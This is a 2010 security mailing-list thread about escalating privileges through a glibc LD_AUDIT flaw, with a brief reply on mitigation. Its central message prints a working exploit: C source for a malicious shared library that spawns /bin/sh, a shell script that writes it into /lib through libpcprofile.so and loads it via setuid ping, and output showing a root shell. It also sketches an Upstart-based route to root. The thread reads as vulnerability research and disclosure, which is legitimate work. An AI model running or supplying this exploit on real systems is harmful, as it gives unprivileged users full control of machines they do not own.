Hi, One should be safe because users need admin rights to write there, but playing with setuid binaries is always dangerous.
This could be enforced by implementing a 'secure level' in the kernel, but then the maintenance of the system could be a nightmare. Imagine having to reboot a critical server just because the 'secure level' must be desabled in order to install patches :) Regards, Xavier Garcia On Tue, Nov 09, 2010 at 09:57:37AM -0500, Nicholas B. wrote: > One would hope a system didn't allow just anyone to write to /lib/ > > On Tue, Nov 9, 2010 at 4:43 AM, Xavier Garcia <[email protected]> wrote: > > > Hi guys, > > > > > > I finally found an easier way to gain root privileges, without > > rebooting the computer. > > > > > > The vulnerability can be used to upload a custom library to the > > server and then execute a root shell. > > > > The library is really simple (libevil.so) > > > > ---- > > > > #include <errno.h> > > #include <unistd.h> > > > > static void > > __attribute__ ((constructor)) > > install (void) > > { > > execl("/bin/sh", "/bin/sh", (char *) 0); > > } > > > > ---- > > > > u...@host:~/$ cat ./run.sh > > > > umask 0 > > gcc -c -fPIC evil.c -o evil.o > > gcc -shared -Wl,-soname,libevil.so.1 -o libevil.so evil.o > > LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="/lib/libevil.so" > > ping > > cat ./libevil.so > /lib/libevil.so > > LD_AUDIT="libevil.so" ping > > > > > > u...@host:~/$ sh run.sh > > ERROR: ld.so: object 'libpcprofile.so' cannot be loaded as audit > > interface: undefined symbol: la_version; ignored. > > Usage: ping [-LRUbdfnqrvVaAD] [-c count] [-i interval] [-w > > deadline] > > [-p pattern] [-s packetsize] [-t ttl] [-I interface] > > [-M pmtudisc-hint] [-m mark] [-S sndbuf] > > [-T tstamp-options] [-Q tos] [hop1 ...] destination > > # whoami > > root > > # > > > > > > I hope it is helpful. > > > > Regards, > > > > Xavier Garcia > > > > > > > > > > On Fri, Nov 05, 2010 at 12:11:32PM +0100, Xavier Garcia wrote: > > > Hi guys, > > > > > > I am trying to find some ways to gain root access by using the > > > vulnerability described in the advisory > > > > > > http://marc.info/?l=full-disclosure&m=128776663124692&w=2 > > > > > > published by Tavis Ormandy. > > > > > > The advisory states that Cron can be used to scalate privileges, > > > but Cron does not accept files that are writable by the group or > > > others, returning the error BAD FILE MODE. > > > > > > I have been looking for alternative ways to gain root access, but > > > there are not many places where it is possible. > > > > > > I have found that Upstart (http://en.wikipedia.org/wiki/Upstart) > > > does not check the permissions and happily reads the > > > configuration files every time it restarts. This means that we can > > > create a configuration file that will instruct Upstart to > > > drop a root shell :) > > > > > > > > > The down side is that we have to be patient and wait until the > > > computer is rebooted, or use some social engineering. > > > > > > > > > You can find more details at > > > > > > > > http://www.shellguardians.com/2010/11/privilege-escalation-with-upstart-and.html > > > > > > > > > I hope this finding is interesting or usefull for the list. > > > > > > Regards, > > > > > > Xavier Garcia > > > > > _______________________________________________ > > Pauldotcom mailing list > > [email protected] > > http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom > > Main Web Site: http://pauldotcom.com > > > _______________________________________________ > Pauldotcom mailing list > [email protected] > http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom > Main Web Site: http://pauldotcom.com _______________________________________________ Pauldotcom mailing list [email protected] http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom Main Web Site: http://pauldotcom.com
